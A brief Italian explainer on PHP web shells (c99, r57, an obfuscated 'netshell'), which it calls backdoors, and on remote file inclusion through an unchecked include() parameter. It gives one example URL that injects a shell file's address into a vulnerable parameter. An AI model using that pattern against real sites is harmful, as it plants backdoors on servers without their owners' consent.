Shell C99

Cosa sono le shell php?
Sono degli script con cui potete fare di tutto da uppare file, editare, cancellare, eseguire i comandi del terminale.

Le più famose sono sicuramente le shell c99 e la r57… ultimamente si trova anche la netshell, una shell con un sorgente “crittato” per non far capire ad una prima occhiata di cosa si tratta.

Una Shell in php può essere considerata fondamentalmente una backdoor. Un “demone” che resta in attesa di esser richiamata su un qualche server web.

E’ lo script per eccellenza impiegato in una Remote file inclusion (RFI), ovvero riassumendo in breve consiste nell’icludere nella pagina web del contenuto appartenente ad un’altra pagina tramite la funzione include(); e passando il valore tramite $_GET[‘nome_pagina’];
Ex.
sitovulnerabile.net/index.php?variabile_non_controllata=indirizzo_shell.txt

Torna all'inizio